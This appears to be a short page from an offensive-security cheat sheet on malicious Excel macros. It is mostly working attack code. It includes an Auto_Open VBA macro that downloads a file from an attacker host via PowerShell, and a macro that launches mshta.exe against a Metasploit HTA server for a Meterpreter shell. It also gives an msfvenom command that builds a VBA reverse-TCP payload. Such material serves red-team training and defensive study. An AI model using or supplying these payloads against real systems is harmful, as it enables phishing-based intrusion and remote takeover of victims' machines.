killchain-compendium/Exploits/Windows/Macros.md

# Macros

* Executes after user clicks enable content

* Open Excel
* View --> Macros --> Create New Macros 

```c
Sub HelloWorld()
    PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://%ATTACKER_IP%/passwd -OutFile C:\passwd", vbNormalFocus)
End Sub

Sub Auto_Open()
    HelloWorld
End Sub
```

## Meterpreter

* Directly execute shell without user interaction
* Configure and run `use windows/misc/hta_server`
* Macro executes `mshta.exe`
```c
Sub HelloWorld()
    PID = Shell("mshta.exe https://%ATTACKER_IP%:8080/c9496fz.hta")
End Sub

Sub Auto_Open()
    HelloWorld
End Sub
```

## Msfvenom

* Create reverse shell via 
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f vba -o surprise.vba
```